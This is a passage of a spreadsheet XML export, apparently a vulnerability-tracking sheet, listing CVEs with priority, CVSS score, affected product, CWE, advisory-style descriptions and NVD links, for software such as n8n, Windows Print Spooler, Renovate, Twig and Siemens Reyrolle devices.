          <t>marker through 2.0.0 contains a path traversal vulnerability in the FastAPI /marker/upload handler that fails to sanitize the file.filename parameter. Unauthenticated attackers can supply filenames containing directory traversal sequences to write arbitrary files to any location or delete existing files on the system.</t>
        </is>
      </c>
      <c r="S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85684</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85877</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86076</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the expression compiler sanitizer resolved through dynamically scoped this and did not reject reserved class member names. A class field named __sanitize could rebind the sanitizer and reach the Function constructor, enabling backend code execution and editor-preview JavaScript execution. The affected AST hook is PrototypeSanitizer in packages/workflow/src/expression-sandboxing.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86083</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the legacy expression engine generated source text by calling the mutable global JSON.stringify while printing synthetic string literals and interpolating timezone data. An expression could replace JSON.stringify and cause later generated source to contain executable attacker-controlled code. The affected code-generation paths include packages/@n8n/expression-runtime/src/bridge/isolated-vm-bridge.ts and packages/@n8n/tournament/src/ExpressionBuilder.ts, and the issue does not affect the vm expression engine. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86730</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions before 5.10.12 fail to properly cleanse string-typed field-layout elements, allowing authenticated control-panel users to inject Yii2 behavior attachments and event handlers. Attackers can post field-layout tab elements as JSON strings to bypass cleanse validation, then trigger arbitrary object instantiation and code execution through Craft::createObject().</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2018-1000164</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr">
        <is>
          <t>pip:gunicorn</t>
        </is>
      </c>
      <c r="M414" s="5" t="inlineStr">
        <is>
          <t>19.5.0</t>
        </is>
      </c>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr"/>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>gunicorn version 19.4.5 contains a CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers vulnerability in "process_headers" function in "gunicorn/http/wsgi.py" that can result in an attacker causing the server to return arbitrary HTTP headers. This vulnerability appears to have been fixed in 19.5.0.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2018-1000164</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-25766</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;= 13.87.0 and &lt;= 19.38.6 leak temporary repository tokens into pull request comments during certain Go Modules update failure scenarios. The issue is fixed in version 19.38.7. Anyone able to view the affected pull request comments could obtain the exposed tokens.</t>
        </is>
      </c>
      <c r="S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2019-25766</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-36939</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.026</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr">
        <is>
          <t>rubygems:cassandra-web</t>
        </is>
      </c>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr"/>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>Cassandra Web 0.5.0 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating path traversal parameters. Attackers can exploit the disabled Rack::Protection module to read sensitive system files like /etc/passwd and retrieve Apache Cassandra database credentials.</t>
        </is>
      </c>
      <c r="S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-36939</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37267</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;=19.180.0 and &lt;23.25.1, when used with Azure DevOps, may expose the bot's authorization token in server or pipeline logs because the git http.extraheader=AUTHORIZATION parameter is logged without redaction. Anyone with access to saved logs could obtain the bot credentials. Fixed in 23.25.1; Azure DevOps users should revoke and regenerate credentials if logs may have been exposed.</t>
        </is>
      </c>
      <c r="S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37267</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0799</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>security@tcpdump.org</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>In BPF instructions that load/store a value from/to a scratch memory register the register index is an unsigned 32-bit integer and must not exceed 15, but libpcap BPF interpreter does not validate the value.  In particular uncommon use cases a crafted filter program can cause the interpreter to try reading and writing the OS process memory in the 16GiB starting at the current stack frame on 64-bit architectures and in the entire address space on 32-bit architectures.</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0799</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12611</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>A client may issue HTTP/2 requests to a Jetty server that result in blocking writes that are never unblocked, eventually causing all threads to be blocked and the whole server to become unresponsive.
This is caused by a race condition in the server when handling RST_STREAM frames and GOAWAY frames sent by the client.
The race condition "resets" the HTTP2Flusher.terminated, previously set to a non-null value, to the null value, allowing entries to be enqueued in the flusher that however will never be processed. These unprocessed entries are the ones that would unblock the write-blocked threads.</t>
        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13097</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>freeipa:freeipa, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation flaw was found in FreeIPA. The uniqueness constraint enforced on Kerberos principal name attributes in the 389-ds directory server does not properly account for equivalent representations of the same principal name, allowing a user with sufficient LDAP write privileges to create a service principal that impersonates an existing privileged one. This can lead to unauthorized acquisition of Kerberos service tickets for sensitive services, potentially resulting in full domain compromise.</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13097</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33197</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>biossecurity@ami.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>AMI APTIOV contains a vulnerability in BIOS where a privileged user may cause the “Incomplete List of Disallowed Inputs” by local access. Successful exploitation of this vulnerability may lead to arbitrary code execution and impact system Confidentiality, Integrity, and Availability.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46636</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>8.699999999999999</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2026-09-04</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>Twig is a template language for PHP. From version 1.0.0 to before version 3.27.0, SecurityPolicy::checkMethodAllowed() unconditionally whitelists all method calls on instances of Twig\Markup. Twig\Markup is not final, so subclasses inherit the bypass. An application that passes an object of a Markup-derived class into a sandboxed template (typically to mark a chunk of HTML as safe) inadvertently exposes every public method of that subclass to template authors, regardless of the configured allowedMethods list. This issue has been patched in version 3.27.0.</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46636</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="R423"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S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62384</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M424" s="5" t="inlineStr">
        <is>
          <t>3.10.2</t>
        </is>
      </c>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr"/>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62648</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The length of the URL component contained in pre-authenticated HTTP messages is not properly validated before appending additional data to it, resulting in an out-of-bounds write condition in memory. This could allow an unauthenticated remote attacker to crash the affected device, causing a reboot and resulting in a denial-of-service condition.</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62649</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The web server does not properly limit or manage system resources when processing a high volume of concurrent HTTP requests. This could allow an unauthenticated remote attacker to cause the entire device to crash and reboot, resulting in a denial-of-service condition.</t>
        </is>
      </c>
